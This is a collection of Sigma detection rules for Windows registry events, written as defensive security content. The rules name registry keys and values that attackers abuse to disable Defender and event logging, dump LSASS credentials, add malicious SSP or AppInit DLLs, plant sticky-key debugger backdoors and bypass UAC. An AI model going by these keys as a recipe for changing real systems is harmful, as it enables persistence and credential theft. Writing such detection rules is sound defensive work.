    "path": "rules/windows/registry/registry_event/registry_event_defender_threat_action_modified.yml",
    "content": "title: Windows Defender Threat Severity Default Action Modified\nid: 5a9e1b2c-8f7d-4a1e-9b3c-0f6d7e5a4b1f\nrelated:\n    - id: 1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e\n      type: similar\nstatus: experimental\ndescription: |\n    Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'.\n    This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level,\n    allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference\n    - https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-threatseveritydefaultaction\n    - https://research.splunk.com/endpoint/7215831c-8252-4ae3-8d43-db588e82f952\n    - https://gist.github.com/Dump-GUY/8daef859f382b895ac6fd0cf094555d2\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\nauthor: 'Matt Anderson (Huntress)'\ndate: 2025-07-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction\\'\n        TargetObject|endswith:\n            - '\\1' # Low severity\n            - '\\2' # Moderate severity\n            - '\\4' # High severity\n            - '\\5' # Severe severity\n        Details:\n            - 'DWORD (0x00000006)' # Allow\n            - 'DWORD (0x00000009)' # NoAction\n    condition: selection\nfalsepositives:\n    - Legitimate administration via scripts or tools (e.g., SCCM, Intune, GPO enforcement). Correlate with administrative activity.\n    - Software installations that legitimately modify Defender settings (less common for these specific keys).\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml",
    "content": "title: Disable Security Events Logging Adding Reg Key MiniNt\nid: 919f2ef0-be2d-4a7a-b635-eb2b41fde044\nstatus: test\ndescription: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stop writing events.\nreferences:\n    - https://twitter.com/0gtweet/status/1182516740955226112\n    - https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\nauthor: Ilyas Ochkov, oscd.community\ndate: 2019-10-25\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1562.002\n    - attack.t1112\n    - car.2022-03-001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n    # Sysmon gives us HKLM\\SYSTEM\\CurrentControlSet\\.. if ControlSetXX is the selected one\n        - TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\MiniNt'\n          EventType: 'CreateKey'    # we don't want deletekey\n    # key rename\n        - NewName: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\MiniNt'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml",
    "content": "title: Wdigest CredGuard Registry Modification\nid: 1a2d6c47-75b0-45bd-b133-2c0be75349fd\nstatus: test\ndescription: |\n  Detects potential malicious modification of the property value of IsCredGuardEnabled from\n  HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\n  This is usually used with UseLogonCredential to manipulate the caching credentials.\nreferences:\n    - https://teamhydra.blog/2020/08/25/bypassing-credential-guard/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2019-08-25\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\IsCredGuardEnabled'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml",
    "content": "title: Esentutl Volume Shadow Copy Service Keys\nid: 5aad0995-46ab-41bd-a9ff-724f41114971\nstatus: test\ndescription: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-20\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'System\\CurrentControlSet\\Services\\VSS'\n        Image|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter\n    filter:\n        TargetObject|contains: 'System\\CurrentControlSet\\Services\\VSS\\Start'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml",
    "content": "title: Windows Credential Editor Registry\nid: a6b33c02-8305-488f-8585-03cb2a7763f2\nstatus: test\ndescription: Detects the use of Windows Credential Editor (WCE)\nreferences:\n    - https://www.ampliasecurity.com/research/windows-credentials-editor/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-31\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0005\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: Services\\WCESERVICE\\Start\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml",
    "content": "title: HybridConnectionManager Service Installation - Registry\nid: ac8866c7-ce44-46fd-8c17-b24acff96ca8\nstatus: test\ndescription: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.\nreferences:\n    - https://twitter.com/Cyb3rWard0g/status/1381642789369286662\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2021-04-12\nmodified: 2022-11-27\ntags:\n    - attack.resource-development\n    - attack.t1608\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection1:\n        TargetObject|contains: '\\Services\\HybridConnectionManager'\n    selection2:\n        EventType: SetValue\n        Details|contains: 'Microsoft.HybridConnectionManager.Listener.exe'\n    condition: selection1 or selection2\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_mal_azorult.yml",
    "content": "title: Registry Entries For Azorult Malware\nid: f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7\nstatus: test\ndescription: Detects the presence of a registry key created during Azorult execution\nreferences:\n    - https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a\nauthor: Trent Liffick\ndate: 2020-05-08\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.execution\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        EventID:\n            - 12\n            - 13\n        TargetObject|contains: 'SYSTEM\\'\n        TargetObject|endswith: '\\services\\localNETService'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_malware_qakbot_registry.yml",
    "content": "title: Potential Qakbot Registry Activity\nid: 1c8e96cd-2bed-487d-9de0-b46c90cade56\nstatus: test\ndescription: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files\nreferences:\n    - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nauthor: Hieu Tran\ndate: 2023-03-13\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Software\\firm\\soft\\Name'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml",
    "content": "title: Path To Screensaver Binary Modified\nid: 67a6c006-3fbe-46a7-9074-2ba3b82c3000\nstatus: test\ndescription: Detects value modification of registry key containing path to binary used as screensaver.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md\n    - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf\nauthor: Bartlomiej Czyz @bczyz1, oscd.community\ndate: 2020-10-11\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.002\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Control Panel\\Desktop\\SCRNSAVE.EXE' # HKEY_CURRENT_USER\\Control Panel\\Desktop\\SCRNSAVE.EXE\n    filter:\n        Image|endswith:\n            - '\\rundll32.exe'\n            - '\\explorer.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate modification of screensaver\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml",
    "content": "title: Narrator's Feedback-Hub Persistence\nid: f663a6d9-9d1b-49b8-b2b1-0637914d199a\nstatus: test\ndescription: Detects abusing Windows 10 Narrator's Feedback-Hub\nreferences:\n    - https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html\nauthor: Dmitriy Lifanov, oscd.community\ndate: 2019-10-25\nmodified: 2022-03-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection1:\n        EventType: DeleteValue\n        TargetObject|endswith: '\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute'\n    selection2:\n        TargetObject|endswith: '\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\(Default)'\n    # Add the payload in the (Default)\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml",
    "content": "title: NetNTLM Downgrade Attack - Registry\nid: d67572a0-e2ec-45d6-b8db-c100d14b8ef2\nstatus: test\ndescription: Detects NetNTLM downgrade attack\nreferences:\n    - https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks\n    - https://www.ultimatewindowssecurity.com/wiki/page.aspx?spid=NSrpcservers\nauthor: Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT)\ndate: 2018-03-20\nmodified: 2024-12-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection_regkey:\n        TargetObject|contains|all:\n            - 'SYSTEM\\'\n            - 'ControlSet'\n            - '\\Control\\Lsa'\n    selection_value_lmcompatibilitylevel:\n        TargetObject|endswith: '\\lmcompatibilitylevel'\n        Details:\n            - 'DWORD (0x00000000)'\n            - 'DWORD (0x00000001)'\n            - 'DWORD (0x00000002)'\n    selection_value_ntlmminclientsec:\n        TargetObject|endswith: '\\NtlmMinClientSec'\n        Details:\n            - 'DWORD (0x00000000)' # No Security\n            - 'DWORD (0x00000010)' # Only Integrity\n            - 'DWORD (0x00000020)' # Only confidentiality\n            - 'DWORD (0x00000030)' # Both Integrity and confidentiality\n    selection_value_restrictsendingntlmtraffic:\n        # Note: The obvious values with issues are 0x00000000 (allow all) and 0x00000001 (audit).\n        # 0x00000002 can be secure but only if \"ClientAllowedNTLMServers\" is properly configured\n        # Hence all values should be monitored and investigated\n        TargetObject|endswith: '\\RestrictSendingNTLMTraffic'\n    condition: selection_regkey and 1 of selection_value_*\nfalsepositives:\n    - Services or tools that set the values to more restrictive values\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml",
    "content": "title: New DLL Added to AppCertDlls Registry Key\nid: 6aa1d992-5925-4e9f-a49b-845e51d1de01\nstatus: test\ndescription: |\n  Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\n  by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\nreferences:\n    - http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/\n    - https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html\nauthor: Ilyas Ochkov, oscd.community\ndate: 2019-10-25\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.009\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        # Sysmon gives us HKLM\\SYSTEM\\CurrentControlSet\\.. if ControlSetXX is the selected one\n        - TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls'\n        # key rename\n        - NewName: 'HKLM\\SYSTEM\\CurentControlSet\\Control\\Session Manager\\AppCertDlls'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml",
    "content": "title: New DLL Added to AppInit_DLLs Registry Key\nid: 4f84b697-c9ed-4420-8ab5-e09af5b2345d\nstatus: test\ndescription: DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html\nauthor: Ilyas Ochkov, oscd.community, Tim Shelton\ndate: 2019-10-25\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.010\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        - TargetObject|endswith:\n              - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls'\n              - '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls'\n        # Key Rename\n        - NewName|endswith:\n              - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls'\n              - '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls'\n    filter:\n        Details: '(Empty)'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_office_test_regadd.yml",
    "content": "title: Office Application Startup - Office Test\nid: 3d27f6dd-1c74-4687-b4fa-ca849d128d1c\nstatus: test\ndescription: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started\nreferences:\n    - https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/\nauthor: omkar72\ndate: 2020-10-25\nmodified: 2023-11-08\ntags:\n    - attack.persistence\n    - attack.t1137.002\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Software\\Microsoft\\Office test\\Special\\Perf'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_office_trust_record_modification.yml",
    "content": "title: Windows Registry Trust Record Modification\nid: 295a59c1-7b79-4b47-a930-df12c15fc9c2\nrelated:\n    - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd\n      type: similar\nstatus: test\ndescription: Alerts on trust record modification within the registry, indicating usage of macros\nreferences:\n    - https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/\n    - http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html\n    - https://twitter.com/inversecos/status/1494174785621819397\nauthor: Antonlovesdnb, Trent Liffick (@tliffick)\ndate: 2020-02-19\nmodified: 2023-06-21\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Security\\Trusted Documents\\TrustRecords'\n    condition: selection\nfalsepositives:\n    - This will alert on legitimate macro usage as well, additional tuning is required\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml",
    "content": "title: Registry Persistence Mechanisms in Recycle Bin\nid: 277efb8f-60be-4f10-b4d3-037802f37167\nstatus: test\ndescription: Detects persistence registry keys for Recycle Bin\nreferences:\n    - https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf\n    - https://persistence-info.github.io/Data/recyclebin.html\n    - https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/\nauthor: frack113\ndate: 2021-11-18\nmodified: 2022-12-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection_create:\n        EventType: RenameKey\n        NewName|contains: '\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open'\n    selection_set:\n        EventType: SetValue\n        TargetObject|contains: '\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command\\(Default)'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml",
    "content": "title: New PortProxy Registry Entry Added\nid: a54f842a-3713-4b45-8c84-5f136fdebd3c\nstatus: test\ndescription: Detects the modification of the PortProxy registry key which is used for port forwarding.\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html\n    - https://adepts.of0x.cc/netsh-portproxy-code/\n    - https://www.dfirnotes.net/portproxy_detection/\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2021-06-22\nmodified: 2024-03-25\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        # Example: HKLM\\System\\CurrentControlSet\\Services\\PortProxy\\v4tov4\\tcp\\0.0.0.0/1337\n        TargetObject|contains: '\\Services\\PortProxy\\v4tov4\\tcp\\'\n    condition: selection\nfalsepositives:\n    - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)\n    - Synergy Software KVM (https://symless.com/synergy)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml",
    "content": "title: RedMimicry Winnti Playbook Registry Manipulation\nid: 5b175490-b652-4b02-b1de-5b5b4083c5f8\nstatus: test\ndescription: Detects actions caused by the RedMimicry Winnti playbook\nreferences:\n    - https://redmimicry.com\nauthor: Alexander Rausch\ndate: 2020-06-24\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains: HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_runkey_winekey.yml",
    "content": "title: WINEKEY Registry Modification\nid: b98968aa-dbc0-4a9c-ac35-108363cbf8d5\nstatus: test\ndescription: Detects potential malicious modification of run keys by winekey or team9 backdoor\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\nauthor: omkar72\ndate: 2020-10-30\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_runonce_persistence.yml",
    "content": "title: Run Once Task Configuration in Registry\nid: c74d7efc-8826-45d9-b8bb-f04fac9e4eff\nstatus: test\ndescription: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup\nreferences:\n    - https://twitter.com/pabraeken/status/990717080805789697\n    - https://lolbas-project.github.io/lolbas/Binaries/Runonce/\nauthor: 'Avneet Singh @v3t0_, oscd.community'\ndate: 2020-11-15\nmodified: 2024-03-25\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Active Setup\\Installed Components'\n        TargetObject|endswith: '\\StubPath'\n    filter_optional_chrome:\n        Details|contains|all:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\'\n            - '\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level' # In some cases the Details will contain an additional flag called \"--channel=stable\" at the end\n    filter_optional_edge:\n        Details|contains:\n            - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n            - 'C:\\Program Files\\Microsoft\\Edge\\Application\\'\n        Details|endswith: '\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate modification of the registry key by legitimate program\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml",
    "content": "title: Shell Open Registry Keys Manipulation\nid: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7\nrelated:\n    - id: dd3ee8cc-f751-41c9-ba53-5a32ed47e563\n      type: similar\nstatus: test\ndescription: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)\nreferences:\n    - https://github.com/hfiref0x/UACME\n    - https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\n    - https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass\n    - https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2022-01-13\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - attack.t1546.001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection1:\n        EventType: SetValue\n        TargetObject|endswith: 'Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue'\n        Details|contains: '\\Software\\Classes\\{'\n    selection2:\n        TargetObject|endswith: 'Classes\\ms-settings\\shell\\open\\command\\DelegateExecute'\n    selection3:\n        EventType: SetValue\n        TargetObject|endswith:\n            - 'Classes\\ms-settings\\shell\\open\\command\\(Default)'\n            - 'Classes\\exefile\\shell\\open\\command\\(Default)'\n    filter_sel3:\n        Details: '(Empty)'\n    condition: selection1 or selection2 or (selection3 and not filter_sel3)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml",
    "content": "title: Potential Credential Dumping Via LSASS SilentProcessExit Technique\nid: 55e29995-75e7-451a-bef0-6225e2f13597\nrelated:\n    - id: 36803969-5421-41ec-b92f-8500f79c23b0\n      type: similar\nstatus: test\ndescription: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process\nreferences:\n    - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/\n    - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-02-26\nmodified: 2022-12-19\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml",
    "content": "title: Security Support Provider (SSP) Added to LSA Configuration\nid: eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc\nstatus: test\ndescription: |\n    Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.\nreferences:\n    - https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/\n    - https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Install-SSP.ps1#L157\nauthor: iwillkeepwatch\ndate: 2019-01-18\nmodified: 2022-08-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.005\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\Control\\Lsa\\Security Packages'\n            - '\\Control\\Lsa\\OSConfig\\Security Packages'\n    filter_main_msiexec:\n        Image:\n            - 'C:\\Windows\\system32\\msiexec.exe'\n            - 'C:\\Windows\\syswow64\\MsiExec.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml",
    "content": "title: Sticky Key Like Backdoor Usage - Registry\nid: baca5663-583c-45f9-b5dc-ea96a22ce542\nstatus: test\ndescription: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen\nreferences:\n    - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/\n    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/\nauthor: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community\ndate: 2018-03-15\nmodified: 2022-11-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.008\n    - car.2014-11-003\n    - car.2014-11-008\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection_registry:\n        TargetObject|endswith:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger'\n    condition: selection_registry\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml",
    "content": "title: Atbroker Registry Change\nid: 9577edbb-851f-4243-8c91-1d5b50c1a39b\nstatus: test\ndescription: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'\nreferences:\n    - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/\n    - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/\nauthor: Mateusz Wydra, oscd.community\ndate: 2020-10-13\nmodified: 2023-01-19\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.persistence\n    - attack.t1547\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs'\n            - 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration'\n    filter_atbroker:\n        Image: 'C:\\Windows\\system32\\atbroker.exe'\n        TargetObject|contains: '\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration'\n        Details: '(Empty)'\n    filter_uninstallers:\n        Image|startswith: 'C:\\Windows\\Installer\\MSI'\n        TargetObject|contains: 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Creation of non-default, legitimate at usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml",
